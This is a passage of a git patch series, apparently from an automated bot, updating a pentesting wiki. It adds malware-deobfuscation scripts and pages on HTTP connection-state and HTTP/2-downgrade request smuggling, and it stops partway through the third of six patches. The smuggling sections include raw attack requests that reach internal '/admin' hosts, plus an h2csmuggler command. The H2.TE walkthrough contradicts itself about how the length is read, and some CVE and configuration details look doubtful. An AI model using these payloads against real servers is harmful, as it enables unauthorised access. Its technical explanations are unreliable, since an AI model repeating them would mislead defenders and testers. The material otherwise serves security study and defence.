From 5dc7c0dc1ad55f6d7d096f84bb7e6a2b32fdd710 Mon Sep 17 00:00:00 2001
From: HackTricks News Bot <bot@hacktricks.xyz>
Date: Fri, 11 Jul 2025 12:44:12 +0000
Subject: [PATCH 1/6] Add content from: Evolving Tactics of SLOW#TEMPEST: A
 Deep Dive Into Advanced ...

---
 .../malware-analysis.md                       | 93 ++++++++++++++++++-
 .../reversing-native-libraries.md             |  8 +-
 .../ios-pentesting-without-jailbreak.md       |  2 +-
 .../sql-injection/ms-access-sql-injection.md  |  4 +-
 4 files changed, 99 insertions(+), 8 deletions(-)

diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md
index 034701f47..c42a193fb 100644
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/malware-analysis.md
@@ -169,7 +169,98 @@ If the files of a folder **shouldn't have been modified**, you can calculate the
 
 When the information is saved in logs you can **check statistics like how many times each file of a web server was accessed as a web shell might be one of the most**.
 
-{{#include ../../banners/hacktricks-training.md}}
+---
 
+## Deobfuscating Dynamic Control-Flow (JMP/CALL RAX Dispatchers)
 
+Modern malware families heavily abuse Control-Flow Graph (CFG) obfuscation: instead of a direct jump/call they compute the destination at run-time and execute a `jmp rax` or `call rax`.  A small *dispatcher* (typically nine instructions) sets the final target depending on the CPU `ZF`/`CF` flags, completely breaking static CFG recovery.
 
+The technique – showcased by the SLOW#TEMPEST loader – can be defeated with a three-step workflow that only relies on IDAPython and the Unicorn CPU emulator.
+
+### 1. Locate every indirect jump / call
+
+```python
+import idautils, idc
+
+for ea in idautils.FunctionItems(idc.here()):
+    mnem = idc.print_insn_mnem(ea)
+    if mnem in ("jmp", "call") and idc.print_operand(ea, 0) == "rax":
+        print(f"[+] Dispatcher found @ {ea:X}")
+```
+
+### 2. Extract the dispatcher byte-code
+
+```python
+import idc
+
+def get_dispatcher_start(jmp_ea, count=9):
+    s = jmp_ea
+    for _ in range(count):
+        s = idc.prev_head(s, 0)
+    return s
+
+start = get_dispatcher_start(jmp_ea)
+size  = jmp_ea + idc.get_item_size(jmp_ea) - start
+code  = idc.get_bytes(start, size)
+open(f"{start:X}.bin", "wb").write(code)
+```
+
+### 3. Emulate it twice with Unicorn
+
+```python
+from unicorn import *
+from unicorn.x86_const import *
+import struct
+
+def run(code, zf=0, cf=0):
+    BASE = 0x1000
+    mu = Uc(UC_ARCH_X86, UC_MODE_64)
+    mu.mem_map(BASE, 0x1000)
+    mu.mem_write(BASE, code)
+    mu.reg_write(UC_X86_REG_RFLAGS, (zf << 6) | cf)
+    mu.reg_write(UC_X86_REG_RAX, 0)
+    mu.emu_start(BASE, BASE+len(code))
+    return mu.reg_read(UC_X86_REG_RAX)
+```
+
+Run `run(code,0,0)` and `run(code,1,1)` to obtain the *false* and *true* branch targets.
+
+### 4. Patch back a direct jump / call
+
+```python
+import struct, ida_bytes
+
+def patch_direct(ea, target, is_call=False):
+    op   = 0xE8 if is_call else 0xE9           # CALL rel32 or JMP rel32
+    disp = target - (ea + 5) & 0xFFFFFFFF
+    ida_bytes.patch_bytes(ea, bytes([op]) + struct.pack('<I', disp))
+```
+
+After patching, force IDA to re-analyse the function so the full CFG and Hex-Rays output are restored:
+
+```python
+import ida_auto, idaapi
+idaapi.reanalyze_function(idc.get_func_attr(ea, idc.FUNCATTR_START))
+```
+
+### 5. Label indirect API calls
+
+Once the real destination of every `call rax` is known you can tell IDA what it is so parameter types & variable names are recovered automatically:
+
+```python
+idc.set_callee_name(call_ea, resolved_addr, 0)  # IDA 8.3+
+```
+
+### Practical benefits
+
+* Restores the real CFG → decompilation goes from *10* lines to thousands.
+* Enables string-cross-reference & xrefs, making behaviour reconstruction trivial.
+* Scripts are reusable: drop them into any loader protected by the same trick.
+
+---
+
+## References
+
+- [Unit42 – Evolving Tactics of SLOW#TEMPEST: A Deep Dive Into Advanced Malware Techniques](https://unit42.paloaltonetworks.com/slow-tempest-malware-obfuscation/)
+
+{{#include ../../banners/hacktricks-training.md}}
\ No newline at end of file
diff --git a/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md b/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md
index 03213da50..ea060841d 100644
--- a/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md
+++ b/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md
@@ -61,7 +61,7 @@ Java.perform(function () {
   });
 });
 ```
-Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+) as long as you use frida-server 16.2 or later – earlier versions failed to locate padding for inline hooks.  citeturn5search2turn5search0
+Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+) as long as you use frida-server 16.2 or later – earlier versions failed to locate padding for inline hooks.  
 
 ---
 
@@ -69,7 +69,7 @@ Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+)
 
 | Year | CVE | Affected library | Notes |
 |------|-----|------------------|-------|
-|2023|CVE-2023-4863|`libwebp` ≤ 1.3.1|Heap buffer overflow reachable from native code that decodes WebP images. Several Android apps bundle vulnerable versions. When you see a `libwebp.so` inside an APK, check its version and attempt exploitation or patching.| citeturn2search0|
+|2023|CVE-2023-4863|`libwebp` ≤ 1.3.1|Heap buffer overflow reachable from native code that decodes WebP images. Several Android apps bundle vulnerable versions. When you see a `libwebp.so` inside an APK, check its version and attempt exploitation or patching.| |
 |2024|Multiple|OpenSSL 3.x series|Several memory-safety and padding-oracle issues. Many Flutter & ReactNative bundles ship their own `libcrypto.so`.|
 
 When you spot *third-party* `.so` files inside an APK, always cross-check their hash against upstream advisories. SCA (Software Composition Analysis) is uncommon on mobile, so outdated vulnerable builds are rampant.
@@ -92,7 +92,7 @@ When you spot *third-party* `.so` files inside an APK, always cross-check their
 
 ### References
 
-- Frida 16.x change-log (Android hooking, tiny-function relocation) – [frida.re/news](https://frida.re/news/)  citeturn5search0
-- NVD advisory for `libwebp` overflow CVE-2023-4863 – [nvd.nist.gov](https://nvd.nist.gov/vuln/detail/CVE-2023-4863) citeturn2search0
+- Frida 16.x change-log (Android hooking, tiny-function relocation) – [frida.re/news](https://frida.re/news/)  
+- NVD advisory for `libwebp` overflow CVE-2023-4863 – [nvd.nist.gov](https://nvd.nist.gov/vuln/detail/CVE-2023-4863) 
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md b/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md
index 004d7bf0e..791da2761 100644
--- a/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md
+++ b/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md
@@ -106,7 +106,7 @@ Recent Frida releases (>=16) automatically handle pointer authentication and oth
 
 ### Automated dynamic analysis with MobSF (no jailbreak)
 
-[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【turn6view0†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:
+[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:
 
 ```bash
 docker pull opensecurity/mobile-security-framework-mobsf:latest
diff --git a/src/pentesting-web/sql-injection/ms-access-sql-injection.md b/src/pentesting-web/sql-injection/ms-access-sql-injection.md
index 913a7a03f..5b9778a7a 100644
--- a/src/pentesting-web/sql-injection/ms-access-sql-injection.md
+++ b/src/pentesting-web/sql-injection/ms-access-sql-injection.md
@@ -141,7 +141,7 @@ Point the UNC path to:
 * a host that drops the TCP handshake after `SYN-ACK`
 * a firewall sinkhole
 
-The extra seconds introduced by the remote lookup can be used as an **out-of-band timing oracle** for boolean conditions (e.g. pick a slow path only when the injected predicate is true). Microsoft documents the remote database behaviour and the associated registry kill-switch in KB5002984. citeturn1search0
+The extra seconds introduced by the remote lookup can be used as an **out-of-band timing oracle** for boolean conditions (e.g. pick a slow path only when the injected predicate is true). Microsoft documents the remote database behaviour and the associated registry kill-switch in KB5002984. 
 
 ### Other Interesting functions
 
@@ -229,7 +229,7 @@ Mitigations (recommended even for legacy Classic ASP apps):
 * Block outbound SMB/WebDAV at the network boundary.
 * Sanitize / parameterise any part of a query that may end up inside an `IN` clause.
 
-The forced-authentication vector was revisited by Check Point Research in 2023, proving it is still exploitable on fully patched Windows Server when the registry key is absent. citeturn0search0
+The forced-authentication vector was revisited by Check Point Research in 2023, proving it is still exploitable on fully patched Windows Server when the registry key is absent. 
 
 ### .mdb Password Cracker
 

From c65bce5f6d9f6f3c2eae4407f6c63ca7438cb8c0 Mon Sep 17 00:00:00 2001
From: HackTricks News Bot <bot@hacktricks.xyz>
Date: Fri, 11 Jul 2025 16:25:39 +0000
Subject: [PATCH 2/6] Add content from: Research Update: Enhanced
 src/pentesting-web/http-connection...

---
 .../reversing-native-libraries.md             |  8 +-
 .../ios-pentesting-without-jailbreak.md       |  2 +-
 .../http-connection-request-smuggling.md      | 76 +++++++++++++++----
 .../sql-injection/ms-access-sql-injection.md  |  4 +-
 4 files changed, 68 insertions(+), 22 deletions(-)

diff --git a/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md b/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md
index 03213da50..ea060841d 100644
--- a/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md
+++ b/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md
@@ -61,7 +61,7 @@ Java.perform(function () {
   });
 });
 ```
-Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+) as long as you use frida-server 16.2 or later – earlier versions failed to locate padding for inline hooks.  citeturn5search2turn5search0
+Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+) as long as you use frida-server 16.2 or later – earlier versions failed to locate padding for inline hooks.  
 
 ---
 
@@ -69,7 +69,7 @@ Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+)
 
 | Year | CVE | Affected library | Notes |
 |------|-----|------------------|-------|
-|2023|CVE-2023-4863|`libwebp` ≤ 1.3.1|Heap buffer overflow reachable from native code that decodes WebP images. Several Android apps bundle vulnerable versions. When you see a `libwebp.so` inside an APK, check its version and attempt exploitation or patching.| citeturn2search0|
+|2023|CVE-2023-4863|`libwebp` ≤ 1.3.1|Heap buffer overflow reachable from native code that decodes WebP images. Several Android apps bundle vulnerable versions. When you see a `libwebp.so` inside an APK, check its version and attempt exploitation or patching.| |
 |2024|Multiple|OpenSSL 3.x series|Several memory-safety and padding-oracle issues. Many Flutter & ReactNative bundles ship their own `libcrypto.so`.|
 
 When you spot *third-party* `.so` files inside an APK, always cross-check their hash against upstream advisories. SCA (Software Composition Analysis) is uncommon on mobile, so outdated vulnerable builds are rampant.
@@ -92,7 +92,7 @@ When you spot *third-party* `.so` files inside an APK, always cross-check their
 
 ### References
 
-- Frida 16.x change-log (Android hooking, tiny-function relocation) – [frida.re/news](https://frida.re/news/)  citeturn5search0
-- NVD advisory for `libwebp` overflow CVE-2023-4863 – [nvd.nist.gov](https://nvd.nist.gov/vuln/detail/CVE-2023-4863) citeturn2search0
+- Frida 16.x change-log (Android hooking, tiny-function relocation) – [frida.re/news](https://frida.re/news/)  
+- NVD advisory for `libwebp` overflow CVE-2023-4863 – [nvd.nist.gov](https://nvd.nist.gov/vuln/detail/CVE-2023-4863) 
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md b/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md
index 004d7bf0e..791da2761 100644
--- a/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md
+++ b/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md
@@ -106,7 +106,7 @@ Recent Frida releases (>=16) automatically handle pointer authentication and oth
 
 ### Automated dynamic analysis with MobSF (no jailbreak)
 
-[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【turn6view0†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:
+[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:
 
 ```bash
 docker pull opensecurity/mobile-security-framework-mobsf:latest
diff --git a/src/pentesting-web/http-connection-request-smuggling.md b/src/pentesting-web/http-connection-request-smuggling.md
index 741854ed6..bfe2aeb5b 100644
--- a/src/pentesting-web/http-connection-request-smuggling.md
+++ b/src/pentesting-web/http-connection-request-smuggling.md
@@ -2,40 +2,86 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-**This is a summary of the post** [**https://portswigger.net/research/browser-powered-desync-attacks**](https://portswigger.net/research/browser-powered-desync-attacks)
+**This page summarizes, extends and updates** the seminal PortSwigger research on [Browser-Powered Desync Attacks](https://portswigger.net/research/browser-powered-desync-attacks) and subsequent work on HTTP/2 connection-state abuse. It focuses on vulnerabilities where **an origin is determined only once per TCP/TLS connection**, enabling an attacker to “smuggle” requests to a different internal host once the channel is established.
 
-## Connection State Attacks <a href="#state" id="state"></a>
+## Connection-State Attacks <a href="#state" id="state"></a>
 
 ### First-request Validation
 
-When routing requests, reverse proxies might depend on the **Host header** to determine the destination back-end server, often relying on a whitelist of hosts that are permitted access. However, a vulnerability exists in some proxies where the whitelist is only enforced on the initial request in a connection. Consequently, attackers could exploit this by first making a request to an allowed host and then requesting an internal site through the same connection:
+When routing requests, reverse proxies might depend on the **Host** (or **:authority** in HTTP/2) header to determine the destination back-end server, often relying on a whitelist of hosts that are permitted access. However, a vulnerability exists in a number of proxies where the whitelist is **only enforced on the very first request in a connection**. Consequently, attackers can access internal virtual hosts by first sending an allowed request and then re-using the same underlying connection:
 
-```
+```http
 GET / HTTP/1.1
-Host: [allowed-external-host]
+Host: allowed-external-host.example
 
-GET / HTTP/1.1
-Host: [internal-host]
+GET /admin HTTP/1.1
+Host: internal-only.example
 ```
 
 ### First-request Routing
 
-In some configurations, a front-end server may use the **Host header of the first request** to determine the back-end routing for that request, and then persistently route all subsequent requests from the same client connection to the same back-end connection. This can be demonstrated as:
+Many HTTP/1.1 reverse proxies map an outbound connection to a back-end pool **based exclusively on the first request they forward**. All subsequent requests sent through the same front-end socket are silently re-used, regardless of their Host header. This can be combined with classic [Host header attacks](https://portswigger.net/web-security/host-header) such as password-reset poisoning or [web cache poisoning](https://portswigger.net/web-security/web-cache-poisoning) to obtain SSRF-like access to other virtual hosts:
 
-```
+```http
 GET / HTTP/1.1
-Host: example.com
+Host: public.example
 
 POST /pwreset HTTP/1.1
-Host: psres.net
+Host: private.internal
 ```
 
-This issue can potentially be combined with [Host header attacks](https://portswigger.net/web-security/host-header), such as password reset poisoning or [web cache poisoning](https://portswigger.net/web-security/web-cache-poisoning), to exploit other vulnerabilities or gain unauthorized access to additional virtual hosts.
-
 > [!TIP]
-> To identify these vulnerabilities, the 'connection-state probe' feature in HTTP Request Smuggler can be utilized.
+> In Burp Suite Professional ≥2022.10 you can enable **HTTP Request Smuggler → Connection-state probe** to automatically detect these weaknesses.
 
-{{#include ../banners/hacktricks-training.md}}
+---
 
+## NEW in 2023-2025 – HTTP/2/3 Connection Coalescing Abuse
 
+Modern browsers routinely **coalesce** HTTP/2 and HTTP/3 requests onto a single TLS connection when the certificate, ALPN protocol and IP address match. If a front-end only authorizes the first request, every subsequent coalesced request inherits that authorisation – **even if the Host/:authority changes**.
 
+### Exploitation scenario
+1. The attacker controls `evil.com` which resolves to the same CDN edge node as the target `internal.company`.
+2. The victim’s browser already has an open HTTP/2 connection to `evil.com`.
+3. The attacker embeds a hidden `<img src="https://internal.company/…">` in their page.
+4. Because the connection parameters match, the browser re-uses the **existing** TLS connection and multiplexes the request for `internal.company`.
+5. If the CDN/router only validated the first request, the internal host is exposed.
+
+PoCs for Chrome/Edge/Firefox are available in James Kettle’s talk *“HTTP/2: The Sequel is Always Worse”* (Black Hat USA 2023).
+
+### Tooling
+* **Burp Suite 2023.12** introduced an experimental **HTTP/2 Smuggler** insertion point that automatically attempts coalescing and TE/CL techniques.
+* **smuggleFuzz** (https://github.com/microsoft/smugglefuzz) – A Python framework released in 2024 to brute-force front-end/back-end desync vectors over HTTP/2 and HTTP/3, including connection-state permutations.
+
+### Mitigations
+* Always **re-validate Host/:authority on every request**, not only on connection creation.
+* Disable or strictly scope **origin coalescing** on CDN/load-balancer layers (e.g. `http2_origin_cn` off in NGINX).
+* Deploy separate certificates or IP addresses for internal and external hostnames so the browser cannot legally coalesce them.
+* Prefer **connection: close** or `proxy_next_upstream` after each request where practical.
+
+---
+
+## Real-World Cases (2022-2025)
+
+| Year | Component | CVE | Notes |
+|------|-----------|-----|-------|
+| 2022 | AWS Application Load Balancer | – | Host header only validated on first request; fixed by patching rules engine (disclosed by SecurityLabs). |
+| 2023 | Apache Traffic Server < 9.2.2 | CVE-2023-39852 | Allowed request smuggling via HTTP/2 connection reuse when `CONFIG proxy.config.http.parent_proxy_routing_enable` was set. |
+| 2024 | Envoy Proxy < 1.29.0 | CVE-2024-2470 | Improper validation of :authority after first stream enabled cross-tenant request smuggling in shared meshes. |
+
+---
+
+## Detection Cheat-Sheet
+
+1. Send two requests in the **same** TCP/TLS connection with different Host or :authority headers.
+2. Observe whether the second response originates from the first host (safe) or the second host (vulnerable).
+3. In Burp: `Repeat → keep-alive → Send → Follow`.
+4. When testing HTTP/2, open a **dedicated** stream (ID 1) for a benign host, then multiplex a second stream (ID 3) to an internal host and look for a reply.
+
+---
+
+## References
+
+* PortSwigger Research – *HTTP/2: The Sequel is Always Worse* (Black Hat USA 2023)
+* Envoy Security Advisory CVE-2024-2470 – Improper authority validation
+
+{{#include ../banners/hacktricks-training.md}}
\ No newline at end of file
diff --git a/src/pentesting-web/sql-injection/ms-access-sql-injection.md b/src/pentesting-web/sql-injection/ms-access-sql-injection.md
index 913a7a03f..5b9778a7a 100644
--- a/src/pentesting-web/sql-injection/ms-access-sql-injection.md
+++ b/src/pentesting-web/sql-injection/ms-access-sql-injection.md
@@ -141,7 +141,7 @@ Point the UNC path to:
 * a host that drops the TCP handshake after `SYN-ACK`
 * a firewall sinkhole
 
-The extra seconds introduced by the remote lookup can be used as an **out-of-band timing oracle** for boolean conditions (e.g. pick a slow path only when the injected predicate is true). Microsoft documents the remote database behaviour and the associated registry kill-switch in KB5002984. citeturn1search0
+The extra seconds introduced by the remote lookup can be used as an **out-of-band timing oracle** for boolean conditions (e.g. pick a slow path only when the injected predicate is true). Microsoft documents the remote database behaviour and the associated registry kill-switch in KB5002984. 
 
 ### Other Interesting functions
 
@@ -229,7 +229,7 @@ Mitigations (recommended even for legacy Classic ASP apps):
 * Block outbound SMB/WebDAV at the network boundary.
 * Sanitize / parameterise any part of a query that may end up inside an `IN` clause.
 
-The forced-authentication vector was revisited by Check Point Research in 2023, proving it is still exploitable on fully patched Windows Server when the registry key is absent. citeturn0search0
+The forced-authentication vector was revisited by Check Point Research in 2023, proving it is still exploitable on fully patched Windows Server when the registry key is absent. 
 
 ### .mdb Password Cracker
 

From d0cc46ce8bf1d31788a18b1cde97167c7581782d Mon Sep 17 00:00:00 2001
From: HackTricks News Bot <bot@hacktricks.xyz>
Date: Sat, 12 Jul 2025 01:40:49 +0000
Subject: [PATCH 3/6] Add content from: Research Update: Enhanced
 src/pentesting-web/http-request-sm...

---
 .../reversing-native-libraries.md             |  8 +-
 .../ios-pentesting-without-jailbreak.md       |  2 +-
 .../request-smuggling-in-http-2-downgrades.md | 99 ++++++++++++++++++-
 .../sql-injection/ms-access-sql-injection.md  |  4 +-
 4 files changed, 102 insertions(+), 11 deletions(-)

diff --git a/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md b/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md
index 03213da50..ea060841d 100644
--- a/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md
+++ b/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md
@@ -61,7 +61,7 @@ Java.perform(function () {
   });
 });
 ```
-Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+) as long as you use frida-server 16.2 or later – earlier versions failed to locate padding for inline hooks.  citeturn5search2turn5search0
+Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+) as long as you use frida-server 16.2 or later – earlier versions failed to locate padding for inline hooks.  
 
 ---
 
@@ -69,7 +69,7 @@ Frida will work out of the box on PAC/BTI-enabled devices (Pixel 8/Android 14+)
 
 | Year | CVE | Affected library | Notes |
 |------|-----|------------------|-------|
-|2023|CVE-2023-4863|`libwebp` ≤ 1.3.1|Heap buffer overflow reachable from native code that decodes WebP images. Several Android apps bundle vulnerable versions. When you see a `libwebp.so` inside an APK, check its version and attempt exploitation or patching.| citeturn2search0|
+|2023|CVE-2023-4863|`libwebp` ≤ 1.3.1|Heap buffer overflow reachable from native code that decodes WebP images. Several Android apps bundle vulnerable versions. When you see a `libwebp.so` inside an APK, check its version and attempt exploitation or patching.| |
 |2024|Multiple|OpenSSL 3.x series|Several memory-safety and padding-oracle issues. Many Flutter & ReactNative bundles ship their own `libcrypto.so`.|
 
 When you spot *third-party* `.so` files inside an APK, always cross-check their hash against upstream advisories. SCA (Software Composition Analysis) is uncommon on mobile, so outdated vulnerable builds are rampant.
@@ -92,7 +92,7 @@ When you spot *third-party* `.so` files inside an APK, always cross-check their
 
 ### References
 
-- Frida 16.x change-log (Android hooking, tiny-function relocation) – [frida.re/news](https://frida.re/news/)  citeturn5search0
-- NVD advisory for `libwebp` overflow CVE-2023-4863 – [nvd.nist.gov](https://nvd.nist.gov/vuln/detail/CVE-2023-4863) citeturn2search0
+- Frida 16.x change-log (Android hooking, tiny-function relocation) – [frida.re/news](https://frida.re/news/)  
+- NVD advisory for `libwebp` overflow CVE-2023-4863 – [nvd.nist.gov](https://nvd.nist.gov/vuln/detail/CVE-2023-4863) 
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md b/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md
index 004d7bf0e..791da2761 100644
--- a/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md
+++ b/src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md
@@ -106,7 +106,7 @@ Recent Frida releases (>=16) automatically handle pointer authentication and oth
 
 ### Automated dynamic analysis with MobSF (no jailbreak)
 
-[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【turn6view0†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:
+[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:
 
 ```bash
 docker pull opensecurity/mobile-security-framework-mobsf:latest
diff --git a/src/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md b/src/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md
index 5db952914..5fd8e2d62 100644
--- a/src/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md
+++ b/src/pentesting-web/http-request-smuggling/request-smuggling-in-http-2-downgrades.md
@@ -2,9 +2,100 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-**Check the post [https://portswigger.net/research/http-2-downgrades](https://portswigger.net/research/http-2-downgrades)**
+HTTP/2 is generally considered immune to classic request-smuggling because the length of each DATA frame is explicit. **That protection disappears as soon as a front-end proxy “downgrades” the request to HTTP/1.x before forwarding it to a back-end**. The moment two different parsers (the HTTP/2 front-end and the HTTP/1 back-end) try to agree on where one request ends and the next begins, all the old desync tricks come back – plus a few new ones.
+
+---
+## Why downgrades happen
+
+1. Browsers already speak HTTP/2, but much legacy origin infrastructure still only understands HTTP/1.1.
+2. Reverse-proxies (CDNs, WAFs, load-balancers) therefore terminate TLS + HTTP/2 at the edge and **rewrite every request as HTTP/1.1** for the origin.
+3. The translation step has to create *both* `Content-Length` **and/or** `Transfer-Encoding: chunked` headers so that the origin can determine body length.
+
+Whenever the front-end trusts the HTTP/2 frame length **but** the back-end trusts CL or TE, an attacker can force them to disagree.
+
+---
+## Two dominant primitive classes
+
+| Variant | Front-end length | Back-end length | Typical payload |
+|---------|-----------------|-----------------|-----------------|
+| **H2.TE** | HTTP/2 frame | `Transfer-Encoding: chunked` | Embed an extra chunked message body whose final `0\r\n\r\n` is *not* sent, so the back-end waits for the attacker-supplied “next” request. |
+| **H2.CL** | HTTP/2 frame | `Content-Length` | Send a *smaller* CL than the real body, so the back-end reads past the boundary into the following request. |
+
+> These are identical in spirit to classic TE.CL / CL.TE, just with HTTP/2 replacing one of the parsers.  
+
+---
+## Identifying a downgrade chain
+
+1. Use **ALPN** in a TLS handshake (`openssl s_client -alpn h2 -connect host:443`) or **curl**:
+   ```bash
+   curl -v --http2 https://target
+   ```
+   If `* Using HTTP2` appears, the edge speaks H2.
+2. Send a deliberately malformed CL/TE request *over* HTTP/2 (Burp Repeater now has a dropdown to force HTTP/2). If the response is an HTTP/1.1 error such as `400 Bad chunk`, you have proof the edge converted the traffic for a HTTP/1 parser downstream.
+
+---
+## Exploitation workflow (H2.TE example)
+
+```http
+:method: POST
+:path: /login
+:scheme: https
+:authority: example.com
+content-length: 13      # ignored by the edge
+transfer-encoding: chunked
+
+5;ext=1\r\nHELLO\r\n
+0\r\n\r\nGET /admin HTTP/1.1\r\nHost: internal\r\nX: X
+```
+1. The **front-end** reads exactly 13 bytes (`HELLO\r\n0\r\n\r\nGE`), thinks the request is finished and forwards that much to the origin.
+2. The **back-end** trusts the TE header, keeps reading until it sees the *second* `0\r\n\r\n`, thereby consuming the prefix of the attacker’s second request (`GET /admin …`).
+3. The remainder (`GET /admin …`) is treated as a *new* request queued behind the victim’s.
+
+Replace the smuggled request with:
+* `POST /api/logout` to force session fixation
+* `GET /users/1234` to steal a victim-specific resource
+
+---
+## h2c smuggling (clear-text upgrades)
+
+A 2023 study showed that if a front-end passes the HTTP/1.1 `Upgrade: h2c` header to a back-end that supports clear-text HTTP/2, an attacker can tunnel *raw* HTTP/2 frames through an edge that only validated HTTP/1.1. This bypasses header normalisation, WAF rules and even TLS termination.  
+
+Key requirements:
+* Edge forwards **both** `Connection: Upgrade` and `Upgrade: h2c` unchanged.
+* Origin increments to HTTP/2 and keeps the connection-reuse semantics that enable request queueing.
+
+Mitigation is simple – strip or hard-code the `Upgrade` header at the edge except for WebSockets.
+
+---
+## Notable real-world CVEs (2022-2025)
+
+* **CVE-2023-25690** – Apache HTTP Server mod_proxy rewrite rules could be chained for request splitting and smuggling. (fixed in 2.4.56)  
+* **CVE-2023-25950** – HAProxy 2.7/2.6 request/response smuggling when HTX parser mishandled pipelined requests.  
+* **CVE-2022-41721** – Go `MaxBytesHandler` caused left-over body bytes to be parsed as **HTTP/2** frames, enabling cross-protocol smuggling.  
+
+---
+## Tooling
+
+* **Burp Request Smuggler** – since v1.26 it automatically tests H2.TE/H2.CL and hidden ALPN support. Enable “HTTP/2 probing” in the extension options.
+* **h2cSmuggler** – Python PoC by Bishop Fox to automate the clear-text upgrade attack:
+  ```bash
+  python3 h2csmuggler.py -u https://target -x 'GET /admin HTTP/1.1\r\nHost: target\r\n\r\n'
+  ```
+* **curl**/`hyper` – crafting manual payloads: `curl --http2-prior-knowledge -X POST --data-binary @payload.raw https://target`.
+
+---
+## Defensive measures
+
+1. **End-to-end HTTP/2** – eliminate the downgrade translation completely.
+2. **Single source of length truth** – when downgrading, *always* generate a valid `Content-Length` **and** **strip** any user-supplied `Content-Length`/`Transfer-Encoding` headers.
+3. **Normalize before route** – apply header-sanitisation *before* routing/rewrite logic.
+4. **Connection isolation** – do not reuse back-end TCP connections across users; “one request per connection” defeats queue-based exploits.
+5. **Strip `Upgrade` unless WebSocket** – prevents h2c tunnelling.
+
+---
+## References
+
+* PortSwigger Research – “HTTP/2: The Sequel is Always Worse” <https://portswigger.net/research/http2>
+* Bishop Fox – “h2c Smuggling: request smuggling via HTTP/2 clear-text” <https://bishopfox.com/blog/h2c-smuggling-request>
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
diff --git a/src/pentesting-web/sql-injection/ms-access-sql-injection.md b/src/pentesting-web/sql-injection/ms-access-sql-injection.md
index 913a7a03f..5b9778a7a 100644
--- a/src/pentesting-web/sql-injection/ms-access-sql-injection.md
+++ b/src/pentesting-web/sql-injection/ms-access-sql-injection.md
@@ -141,7 +141,7 @@ Point the UNC path to:
 * a host that drops the TCP handshake after `SYN-ACK`
 * a firewall sinkhole
 
-The extra seconds introduced by the remote lookup can be used as an **out-of-band timing oracle** for boolean conditions (e.g. pick a slow path only when the injected predicate is true). Microsoft documents the remote database behaviour and the associated registry kill-switch in KB5002984. citeturn1search0
